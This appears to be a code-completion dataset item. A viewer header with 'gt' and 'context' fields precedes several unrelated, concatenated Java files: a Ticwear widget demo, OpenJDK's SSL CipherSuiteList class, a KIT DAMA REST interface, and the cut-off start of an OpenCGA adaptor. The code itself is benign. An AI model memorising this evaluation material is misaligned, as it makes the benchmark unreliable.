gt
stringclasses
1 value
context
stringlengths
2.05k
161k
/* * Copyright (c) 2016 Mobvoi Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.mobvoi.design.demo.fragments; import android.animation.ValueAnimator; import android.animation.ValueAnimator.AnimatorUpdateListener; import android.app.Dialog; import android.content.Context; import android.content.DialogInterface; import android.content.DialogInterface.OnShowListener; import android.support.annotation.NonNull; import android.support.annotation.StringRes; import android.view.LayoutInflater; import android.view.View; import android.widget.TextView; import android.widget.Toast; import com.ticwear.design.demo.R; import ticwear.design.app.AlertDialog; import ticwear.design.drawable.CircularProgressDrawable; import ticwear.design.widget.FloatingActionButton; import ticwear.design.widget.FloatingActionButton.DelayedConfirmationListener; import ticwear.design.widget.SwipeTodoView; import ticwear.design.widget.VolumeBar; /** * Created by tankery on 1/12/16. 
* <p>Demo fragment listing the Ticwear design widgets. Tapping a list item opens
* a dialog that showcases the corresponding widget (FAB, buttons, volume bar,
* swipe-todo, clock loading). Picker and progress entries are not implemented yet.
*/
public class WidgetsFragment extends ListFragment {

    /** Titles shown in the list; each maps to one demo dialog created below. */
    @Override
    protected int[] getItemTitles() {
        return new int[]{
                R.string.category_widgets_fab,
                R.string.category_widgets_fab_delay,
                R.string.category_widgets_button,
                R.string.category_widgets_volume_bar,
                R.string.category_widgets_swipe_todo,
                R.string.category_widgets_picker,
                R.string.category_widgets_progress,
                R.string.category_widgets_loading,
        };
    }

    /** Shows the demo dialog for the tapped title, if one exists. */
    @Override
    public void onTitleClicked(View view, @StringRes int titleResId) {
        Dialog dialog = createDialog(view.getContext(), titleResId);
        if (dialog != null) {
            dialog.show();
        }
    }

    /**
     * Builds the dialog matching the given title resource.
     *
     * @param context context used to inflate and host the dialog
     * @param resId   string resource id of the tapped list entry
     * @return the dialog to show, or null for entries without a demo
     *         (picker and progress currently fall through to null)
     */
    private Dialog createDialog(final Context context, int resId) {
        Dialog dialog = null;
        LayoutInflater inflater = (LayoutInflater) context.getSystemService(Context.LAYOUT_INFLATER_SERVICE);
        switch (resId) {
            case R.string.category_widgets_fab:
                dialog = createFABDialog(context, inflater);
                break;
            case R.string.category_widgets_fab_delay: {
                dialog = createFABDelayConfirmDialog(context, inflater);
                break;
            }
            case R.string.category_widgets_button: {
                // Plain button list; uses the datetime alert theme for its look.
                dialog = new AlertDialog.Builder(context, ticwear.design.R.style.Theme_Ticwear_Dialog_Alert_Datetime)
                        .setTitle(R.string.category_widgets_button)
                        .setView(R.layout.widgets_btn_list)
                        .create();
                break;
            }
            case R.string.category_widgets_volume_bar:
                dialog = createVolumeBarDialog(context, inflater);
                break;
            case R.string.category_widgets_swipe_todo:
                dialog = createSwipeTodoDialog(context, inflater);
                break;
            case R.string.category_widgets_picker:
                // not implemented yet
                break;
            case R.string.category_widgets_progress:
                // not implemented yet
                break;
            case R.string.category_widgets_loading:
                dialog = createClockLoadingDialog(context, inflater);
                break;
        }
        return dialog;
    }

    /**
     * FAB demo: tapping the content toggles the FAB between minimized and shown;
     * tapping the FAB itself cycles through three progress modes
     * (determinate -> indeterminate -> none) via {@code clickCount % 3}.
     */
    @NonNull
    private Dialog createFABDialog(Context context, LayoutInflater inflater) {
        View layout = inflater.inflate(
                R.layout.widgets_fab_scroll, null);
        final FloatingActionButton fab = (FloatingActionButton) layout.findViewById(R.id.fab);
        View.OnClickListener listener = new View.OnClickListener() {
            boolean isShow = true;

            @Override
            public void onClick(View v) {
                if (isShow) {
                    fab.minimize();
                } else {
                    fab.show();
                }
                isShow = !isShow;
            }
        };
        layout.findViewById(R.id.text_content)
                .setOnClickListener(listener);
        layout.setOnClickListener(listener);
        fab.setOnClickListener(new View.OnClickListener() {
            private int clickCount = 0;
            // Drives the determinate progress from 0 to 1 over 5 seconds.
            private ValueAnimator increaseAnimator = ValueAnimator.ofFloat(0, 1)
                    .setDuration(5000);

            {
                increaseAnimator.addUpdateListener(new AnimatorUpdateListener() {
                    @Override
                    public void onAnimationUpdate(ValueAnimator animation) {
                        float progress = (float) animation.getAnimatedValue();
                        fab.setProgressPercent(progress);
                        // When determinate progress completes, advance to the
                        // next mode as if the FAB had been clicked again.
                        if (progress >= 1) {
                            onClick(null);
                        }
                    }
                });
            }

            @Override
            public void onClick(View v) {
                clickCount++;
                int count = clickCount % 3;
                // count: 1 = determinate, 2 = indeterminate, 0 = progress off.
                fab.setShowProgress(count != 0);
                switch (count) {
                    case 1:
                        fab.setProgressMode(CircularProgressDrawable.MODE_DETERMINATE);
                        increaseAnimator.start();
                        break;
                    case 2:
                        increaseAnimator.cancel();
                        fab.setProgressMode(CircularProgressDrawable.MODE_INDETERMINATE);
                        fab.startProgress();
                        break;
                    default:
                        increaseAnimator.cancel();
                        break;
                }
            }
        });
        Dialog dialog = new Dialog(context);
        dialog.setContentView(layout);
        return dialog;
    }

    /**
     * Delayed-confirmation FAB demo: once the dialog is shown, the FAB starts a
     * 5 second confirmation countdown; a toast reports whether the user clicked
     * the button or the timer ran out.
     */
    private Dialog createFABDelayConfirmDialog(Context context, LayoutInflater inflater) {
        View layout = inflater.inflate(
                R.layout.widgets_fab_scroll, null);
        final FloatingActionButton fab = (FloatingActionButton) layout.findViewById(R.id.fab);
        fab.setImageResource(ticwear.design.R.drawable.tic_ic_btn_ok);
        final TextView content = (TextView) layout.findViewById(R.id.text_content);
        content.setText(R.string.text_dialog_delay_confirm);
        Dialog dialog = new Dialog(context);
        dialog.setContentView(layout);
        // Start the countdown only when the dialog becomes visible.
        dialog.setOnShowListener(new OnShowListener() {
            @Override
            public void onShow(DialogInterface dialog) {
                fab.startDelayConfirmation(5000, new DelayedConfirmationListener() {
                    @Override
                    public void onButtonClicked(FloatingActionButton fab) {
                        Toast.makeText(fab.getContext(), "Button clicked", Toast.LENGTH_SHORT).show();
                    }

                    @Override
                    public void onTimerFinished(FloatingActionButton fab) {
                        Toast.makeText(fab.getContext(), "Timer finished", Toast.LENGTH_SHORT).show();
                    }
                });
            }
        });
        return dialog;
    }

    /**
     * Volume bar demo: mirrors the bar's progress into a text view and marks the
     * bar selected after 3 seconds.
     */
    @NonNull
    private Dialog createVolumeBarDialog(Context context, LayoutInflater inflater) {
        Dialog dialog;
        dialog = new Dialog(context);
        View layout = inflater.inflate(
                R.layout.widgets_volume_bar, null);
        final VolumeBar vBar = (VolumeBar) layout.findViewById(R.id.volume_bar);
        final TextView tv = (TextView) layout.findViewById(R.id.volume_text);
        // +"" converts the int to a String so setText(CharSequence) is called
        // rather than the setText(int resId) overload.
        tv.setText(vBar.getProgress() + "");
        vBar.postDelayed(new Runnable() {
            @Override
            public void run() {
                vBar.setSelected(true);
                // vBar.setValueColor(Color.RED);
            }
        }, 3000);
        vBar.setOnVolumeChangedListetener(new VolumeBar.OnVolumeChangedListener() {
            @Override
            public void onVolumeChanged(VolumeBar volumeBar, int progress, boolean fromUser) {
                tv.setText(progress + "");
            }
        });
        dialog.setContentView(layout);
        return dialog;
    }

    /**
     * Swipe-todo demo: swiping to either icon shows a toast ("Dismissed" /
     * "Confirmed") and closes the dialog. Uses the non-swipe dialog theme so the
     * dialog itself cannot be swiped away.
     */
    @NonNull
    private Dialog createSwipeTodoDialog(final Context context, LayoutInflater inflater) {
        final Dialog dialog = new Dialog(context, ticwear.design.R.style.Theme_Ticwear_Dialog_Alert_NonSwipe);
        View layout = inflater.inflate(R.layout.widgets_swipe_todo, null);
        SwipeTodoView swipeToDo = (SwipeTodoView) layout.findViewById(R.id.swipe_to_do);
        swipeToDo.setLeftIconListener(new SwipeTodoView.OnSelectChangedListener() {
            @Override
            public void onSelected() {
                Toast.makeText(context, "Dismissed", Toast.LENGTH_SHORT).show();
                dialog.dismiss();
            }
        });
        swipeToDo.setRightIconListener(new SwipeTodoView.OnSelectChangedListener() {
            @Override
            public void onSelected() {
                Toast.makeText(context, "Confirmed", Toast.LENGTH_SHORT).show();
                dialog.dismiss();
            }
        });
        dialog.setContentView(layout);
        return dialog;
    }

    /** Clock-loading demo: just hosts the clock loading layout in a dialog. */
    @NonNull
    private Dialog createClockLoadingDialog(final Context context, LayoutInflater inflater) {
        Dialog dialog;
        dialog = new Dialog(context);
        View layout = inflater.inflate(R.layout.widgets_clock_loading, null);
        dialog.setContentView(layout);
        return dialog;
    }
}
/*
 * Copyright (c) 2002, 2010, Oracle and/or its affiliates. All rights reserved.
 * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
 *
 * This code is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License version 2 only, as
 * published by the Free Software Foundation.  Oracle designates this
 * particular file as subject to the "Classpath" exception as provided
 * by Oracle in the LICENSE file that accompanied this code.
 *
 * This code is distributed in the hope that it will be useful, but WITHOUT
 * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
 * FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License
 * version 2 for more details (a copy is included in the LICENSE file that
 * accompanied this code).
 *
 * You should have received a copy of the GNU General Public License version
 * 2 along with this work; if not, write to the Free Software Foundation,
 * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
 *
 * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
 * or visit www.oracle.com if you need additional information or have any
 * questions.
 */

package sun.security.ssl;

import java.io.*;
import java.util.*;

import javax.net.ssl.SSLException;

/**
 * A list of CipherSuites. Also maintains the lists of supported and
 * default ciphersuites and supports I/O from handshake streams.
 *
 * Instances of this class are immutable.
 */
final class CipherSuiteList {

    // lists of supported and default enabled ciphersuites
    // created on demand
    private static CipherSuiteList supportedSuites, defaultSuites;

    private final Collection<CipherSuite> cipherSuites;
    // lazily built name array; guarded by "synchronized" on toStringArray()
    private String[] suiteNames;

    // flag indicating whether this list contains any ECC ciphersuites.
    // null if not yet checked.
    private volatile Boolean containsEC;

    // for use by buildAvailableCache() and
    // Handshaker.getKickstartMessage() only
    // NOTE(review): takes ownership of the collection without copying; callers
    // must not modify it afterwards (instances are documented as immutable).
    CipherSuiteList(Collection<CipherSuite> cipherSuites) {
        this.cipherSuites = cipherSuites;
    }

    /**
     * Create a CipherSuiteList with a single element.
     */
    CipherSuiteList(CipherSuite suite) {
        cipherSuites = new ArrayList<CipherSuite>(1);
        cipherSuites.add(suite);
    }

    /**
     * Construct a CipherSuiteList from a array of names. We don't bother
     * to eliminate duplicates.
     *
     * @exception IllegalArgumentException if the array or any of its elements
     * is null or if the ciphersuite name is unrecognized or unsupported
     * using currently installed providers.
     */
    CipherSuiteList(String[] names) {
        if (names == null) {
            throw new IllegalArgumentException("CipherSuites may not be null");
        }
        cipherSuites = new ArrayList<CipherSuite>(names.length);
        // refresh available cache once if a CipherSuite is not available
        // (maybe new JCE providers have been installed)
        boolean refreshed = false;
        for (int i = 0; i < names.length; i++) {
            String suiteName = names[i];
            CipherSuite suite = CipherSuite.valueOf(suiteName);
            if (suite.isAvailable() == false) {
                if (refreshed == false) {
                    // clear the cache so that the isAvailable() call below
                    // does a full check
                    clearAvailableCache();
                    refreshed = true;
                }
                // still missing?
                if (suite.isAvailable() == false) {
                    throw new IllegalArgumentException("Cannot support "
                        + suiteName + " with currently installed providers");
                }
            }
            cipherSuites.add(suite);
        }
    }

    /**
     * Read a CipherSuiteList from a HandshakeInStream in V3 ClientHello
     * format. Does not check if the listed ciphersuites are known or
     * supported.
     */
    CipherSuiteList(HandshakeInStream in) throws IOException {
        byte[] bytes = in.getBytes16();
        // each suite id is exactly two bytes, so the length must be even
        if ((bytes.length & 1) != 0) {
            throw new SSLException("Invalid ClientHello message");
        }
        cipherSuites = new ArrayList<CipherSuite>(bytes.length >> 1);
        for (int i = 0; i < bytes.length; i += 2) {
            cipherSuites.add(CipherSuite.valueOf(bytes[i], bytes[i+1]));
        }
    }

    /**
     * Return whether this list contains the given CipherSuite.
     */
    boolean contains(CipherSuite suite) {
        return cipherSuites.contains(suite);
    }

    // Return whether this list contains any ECC ciphersuites.
    // Result is cached in the volatile "containsEC" field; recomputing it
    // concurrently is harmless because the answer is deterministic.
    boolean containsEC() {
        if (containsEC == null) {
            for (CipherSuite c : cipherSuites) {
                switch (c.keyExchange) {
                case K_ECDH_ECDSA:
                case K_ECDH_RSA:
                case K_ECDHE_ECDSA:
                case K_ECDHE_RSA:
                case K_ECDH_ANON:
                    containsEC = true;
                    return true;
                default:
                    break;
                }
            }
            containsEC = false;
        }
        return containsEC;
    }

    /**
     * Return an Iterator for the CipherSuites in this list.
     */
    Iterator<CipherSuite> iterator() {
        return cipherSuites.iterator();
    }

    /**
     * Return a reference to the internal Collection of CipherSuites.
     * The Collection MUST NOT be modified.
     */
    Collection<CipherSuite> collection() {
        return cipherSuites;
    }

    /**
     * Return the number of CipherSuites in this list.
     */
    int size() {
        return cipherSuites.size();
    }

    /**
     * Return an array with the names of the CipherSuites in this list.
     */
    synchronized String[] toStringArray() {
        if (suiteNames == null) {
            suiteNames = new String[cipherSuites.size()];
            int i = 0;
            for (CipherSuite c : cipherSuites) {
                suiteNames[i++] = c.name;
            }
        }
        // clone so callers cannot mutate the cached array
        return suiteNames.clone();
    }

    public String toString() {
        return cipherSuites.toString();
    }

    /**
     * Write this list to an HandshakeOutStream in V3 ClientHello format.
     */
    void send(HandshakeOutStream s) throws IOException {
        // two bytes per suite: high byte then low byte of the suite id
        byte[] suiteBytes = new byte[cipherSuites.size() * 2];
        int i = 0;
        for (CipherSuite c : cipherSuites) {
            suiteBytes[i] = (byte)(c.id >> 8);
            suiteBytes[i+1] = (byte)c.id;
            i += 2;
        }
        s.putBytes16(suiteBytes);
    }

    /**
     * Clear cache of available ciphersuites. If we support all ciphers
     * internally, there is no need to clear the cache and calling this
     * method has no effect.
     */
    static synchronized void clearAvailableCache() {
        if (CipherSuite.DYNAMIC_AVAILABILITY) {
            supportedSuites = null;
            defaultSuites = null;
            CipherSuite.BulkCipher.clearAvailableCache();
            JsseJce.clearEcAvailable();
        }
    }

    /**
     * Return the list of all available CipherSuites with a priority of
     * minPriority or above.
     * Should be called with the Class lock held.
     */
    private static CipherSuiteList buildAvailableCache(int minPriority) {
        // SortedSet automatically arranges ciphersuites in default
        // preference order
        Set<CipherSuite> cipherSuites = new TreeSet<CipherSuite>();
        Collection<CipherSuite> allowedCipherSuites =
                CipherSuite.allowedCipherSuites();
        for (CipherSuite c : allowedCipherSuites) {
            if ((c.allowed == false) || (c.priority < minPriority)) {
                continue;
            }
            if (c.isAvailable()) {
                cipherSuites.add(c);
            }
        }
        return new CipherSuiteList(cipherSuites);
    }

    /**
     * Return supported CipherSuites in preference order.
     */
    static synchronized CipherSuiteList getSupported() {
        if (supportedSuites == null) {
            supportedSuites =
                buildAvailableCache(CipherSuite.SUPPORTED_SUITES_PRIORITY);
        }
        return supportedSuites;
    }

    /**
     * Return default enabled CipherSuites in preference order.
     */
    static synchronized CipherSuiteList getDefault() {
        if (defaultSuites == null) {
            defaultSuites =
                buildAvailableCache(CipherSuite.DEFAULT_SUITES_PRIORITY);
        }
        return defaultSuites;
    }
}
/**
 * Copyright (C) 2014 Karlsruhe Institute of Technology
 *
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */
package edu.kit.dama.rest.dataworkflow.services.interfaces;

import com.qmino.miredot.annotations.ReturnType;
import com.sun.jersey.api.core.HttpContext;
import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration;
import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask;
import edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment;
import edu.kit.dama.rest.base.ICommonRestInterface;
import edu.kit.dama.rest.base.IEntityWrapper;
import edu.kit.dama.util.Constants;
import javax.ws.rs.DefaultValue;
import javax.ws.rs.FormParam;
import javax.ws.rs.GET;
import javax.ws.rs.POST;
import javax.ws.rs.Path;
import javax.ws.rs.PathParam;
import javax.ws.rs.Produces;
import javax.ws.rs.QueryParam;
import javax.ws.rs.core.MediaType;

/**
 * REST interface for querying and creating DataWorkflow tasks, task
 * configurations and execution environment configurations.
 *
 * @author mf6319
 */
@Path("/rest/dataworkflow")
public interface IDataWorkflowRestService extends ICommonRestInterface {

  /**
   * Get a DataWorkflow task by its id.
   *
   * @summary Get a DataWorkflow task by its id.
   *
   * @param groupId The id of the group used to access the task.
   * @param id The id of the task.
   * @param hc The HttpContext for OAuth check.
   *
   * @return An DataWorkflowTaskWrapper object.
   *
   * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper
   */
  @GET
  @Path(value = "/tasks/{id}")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>")
  IEntityWrapper<? extends IDefaultDataWorkflowTask> getTaskById(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @PathParam("id") Long id,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get all accessible DataWorkflow tasks.
   *
   * @summary Get all accessible DataWorkflow tasks.
   *
   * @param groupId The id of the group used to access the tasks.
   * @param first The first task index.
   * @param results The max. number of results.
   * @param hc The HttpContext for OAuth check.
   *
   * @return A list of DataWorkflowTaskWrapper objects.
   *
   * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper
   */
  @GET
  @Path(value = "/tasks/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>")
  IEntityWrapper<? extends IDefaultDataWorkflowTask> getAllTasks(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first,
          @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get the number of accessible DataWorkflow tasks.
   *
   * @summary Get the number of accessible DataWorkflow tasks.
   *
   * @param groupId The id of the group used to access the tasks.
   * @param hc The HttpContext for OAuth check.
   *
   * @return A DataWorkflowTaskWrapper object containing the number of
   * accessible tasks.
   *
   * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper
   */
  @GET
  @Path(value = "/tasks/count/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>")
  IEntityWrapper<? extends IDefaultDataWorkflowTask> getTaskCount(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Create a new DataWorkflow task. Therefor, the following arguments are
   * needed:
   *
   * <ul>
   * <li>configurationId: The Id of a DataWorkflowTaskConfiguration describing
   * the task and standard parameters.</li>
   * <li>environmentId: The Id of the ExecutionEnvironmentConfiguration
   * responsible for executing the task.</li>
   * <li>predecessorId: The Id of the DataWorkflowTask that is predecessor of
   * this task. This parameter is optional.</li>
   * <li>inputObjectMap: A map of input object id (key) and an associated data
   * organization view name (value). The format of this string can be either
   * in the form
   * <i>1=default\n2=customView</i> or
   * <i>[{"1":"default"},{"2":"customView"}]</i>. Furthermore, the baseId as
   * well as the digitalObjectIdentifier are supported as keys.
   * </li>
   * <li>executionSettings: A map of custom execution settings. The according
   * properties file will be stored in the working directory of the task
   * execution and can be read by the user application. The format of this
   * string can be either in the form
   * <i>key1=value1\nkey2=value2</i> or
   * <i>[{"key1":"value1"},{"key2":"value2"}]</i>
   * This argument should be optional in most cases.</li>
   * <li>applicationArguments: Custom application arguments that are provided
   * during the user application execution. The value can be provided as space
   * separated string. This argument should be optional in most cases.</li>
   * </ul>
   *
   * After successful creation the task execution will be performed within one
   * of the next processing cycles. As the processing of each task takes
   * multiple processing cycles a regular check of the task status will be
   * necessary.
   *
   * @summary Create a new DataWorkflow task.
   *
   * @param groupId The id of the group the node belongs to.
   * @param investigationId The investigation the output object of the task is
   * assigned to.
   * @param configurationId The task configuration id.
   * @param environmentId The execution environment configuration id.
   * @param predecessorId The predecessor task id.
   * @param inputObjectMap The input object map.
   * @param executionSettings The execution settings map.
   * @param applicationArguments The application arguments.
   *
   * @param hc The HttpContext for OAuth check.
   *
   * @return A DataWorkflowTaskWrapper object.
   *
   * @see edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskWrapper
   */
  @POST
  @Path(value = "/tasks/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowTask>")
  IEntityWrapper<? extends IDefaultDataWorkflowTask> createTask(
          @FormParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @FormParam("investigationId") Long investigationId,
          @FormParam("configurationId") Long configurationId,
          @FormParam("environmentId") Long environmentId,
          @FormParam("predecessorId") Long predecessorId,
          @FormParam("inputObjectMap") String inputObjectMap,
          @FormParam("executionSettings") String executionSettings,
          @FormParam("applicationArguments") String applicationArguments,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get a task configurations by its id.
   *
   * @summary Get a task configuration by its id.
   *
   * @param groupId The id of the group the task configurations belong to
   * (default: USERS).
   * @param id The id of the task configuration.
   * @param hc The HttpContext for OAuth check.
   *
   * @return A DataWorkflowTaskConfigurationWrapper object containing all
   * results.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper
   */
  @GET
  @Path(value = "/configurations/{id}")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>")
  IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getTaskConfigurationById(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @PathParam("id") Long id,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get all task configurations accessible by the group with the id
   * <i>groupId</i> beginning with index
   * <i>first</i>. The max. number of results is defined by <i>results</i>.
   *
   * @summary Get all task configurations.
   *
   * @param groupId The id of the group the task configurations belong to
   * (default: USERS).
   * @param first The first index (default: 0).
   * @param results The max. number of results (default: 10).
   * @param hc The HttpContext for OAuth check.
   *
   * @return A DataWorkflowTaskConfigurationWrapper object containing all
   * results.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper
   */
  @GET
  @Path(value = "/configurations/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>")
  IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getAllTaskConfigurations(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first,
          @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get the number of task configurations accessible by the group with the id
   * <i>groupId</i>.
   *
   * @summary Get the task configuration count.
   *
   * @param groupId The id of the group the task configurations belong to.
   * @param hc The HttpContext for OAuth check.
   *
   * @return A DataWorkflowTaskConfigurationWrapper object containing the
   * number of accessible task configurations.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.DataWorkflowTaskConfigurationWrapper
   */
  @GET
  @Path(value = "/configurations/count/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultDataWorkflowConfiguration>")
  IEntityWrapper<? extends IDefaultDataWorkflowConfiguration> getTaskConfigurationCount(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get an execution environment configurations by its id.
   *
   * @summary Get an execution environment configuration by its id.
   *
   * @param groupId The id of the group the environment configurations belong
   * to (default: USERS).
   * @param id The id of the execution environment configuration.
   * @param hc The HttpContext for OAuth check.
   *
   * @return An ExecutionEnvironmentConfigurationWrapper object containing all
   * results.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper
   */
  @GET
  @Path(value = "/environments/{id}")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>")
  IEntityWrapper<? extends IDefaultExecutionEnvironment> getExecutionEnvironmentConfigurationById(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @PathParam("id") Long id,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get all execution environment configurations accessible by the group with
   * the id <i>groupId</i> beginning with index
   * <i>first</i>. The max. number of results is defined by <i>results</i>.
   *
   * @summary Get all execution environment configurations.
   *
   * @param groupId The id of the group the environment configurations belong
   * to (default: USERS).
   * @param first The first index (default: 0).
   * @param results The max. number of results (default: 10).
   * @param hc The HttpContext for OAuth check.
   *
   * @return An ExecutionEnvironmentConfigurationWrapper object containing all
   * results.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper
   */
  @GET
  @Path(value = "/environments/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>")
  IEntityWrapper<? extends IDefaultExecutionEnvironment> getAllExecutionEnvironmentConfigurations(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @QueryParam("first") @DefaultValue(Constants.REST_DEFAULT_MIN_INDEX) Integer first,
          @QueryParam("results") @DefaultValue(Constants.REST_DEFAULT_MAX_RESULTS) Integer results,
          @javax.ws.rs.core.Context HttpContext hc);

  /**
   * Get the number of execution environment configurations accessible by the
   * group with the id <i>groupId</i>.
   *
   * @summary Get the execution environment configuration count.
   *
   * @param groupId The id of the group the environment configurations belong
   * to.
   * @param hc The HttpContext for OAuth check.
   *
   * @return An ExecutionEnvironmentConfigurationWrapper object containing the
   * number of accessible execution environment configurations.
   *
   * @see
   * edu.kit.dama.rest.dataworkflow.types.ExecutionEnvironmentConfigurationWrapper
   */
  @GET
  @Path(value = "/environments/count/")
  @Produces({MediaType.APPLICATION_XML, MediaType.APPLICATION_JSON})
  @ReturnType("edu.kit.dama.rest.base.IEntityWrapper<edu.kit.dama.mdm.dataworkflow.interfaces.IDefaultExecutionEnvironment>")
  IEntityWrapper<? extends IDefaultExecutionEnvironment> getExecutionEnvironmentConfigurationCount(
          @QueryParam("groupId") @DefaultValue(Constants.USERS_GROUP_ID) String groupId,
          @javax.ws.rs.core.Context HttpContext hc);
}
/* * Copyright 2015-2020 OpenCB * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.opencb.opencga.catalog.db.mongodb; import com.mongodb.MongoClient; import com.mongodb.client.ClientSession; import com.mongodb.client.model.Aggregates; import com.mongodb.client.model.Filters; import com.mongodb.client.model.Projections; import org.apache.commons.lang3.StringUtils; import org.bson.Document; import org.bson.conversions.Bson; import org.opencb.commons.datastore.core.DataResult; import org.opencb.commons.datastore.core.Query; import org.opencb.commons.datastore.core.QueryOptions; import org.opencb.commons.datastore.core.QueryParam; import org.opencb.commons.datastore.mongodb.MongoDBCollection; import org.opencb.commons.datastore.mongodb.MongoDBIterator; import org.opencb.commons.utils.CollectionUtils; import org.opencb.opencga.catalog.auth.authorization.AuthorizationDBAdaptor; import org.opencb.opencga.catalog.auth.authorization.AuthorizationManager; import org.opencb.opencga.catalog.auth.authorization.CatalogAuthorizationManager; import org.opencb.opencga.catalog.db.DBAdaptorFactory; import org.opencb.opencga.catalog.db.api.StudyDBAdaptor; import org.opencb.opencga.catalog.exceptions.CatalogAuthorizationException; import org.opencb.opencga.catalog.exceptions.CatalogDBException; import org.opencb.opencga.catalog.exceptions.CatalogException; import org.opencb.opencga.catalog.exceptions.CatalogParameterException; import org.opencb.opencga.core.config.Configuration; import 
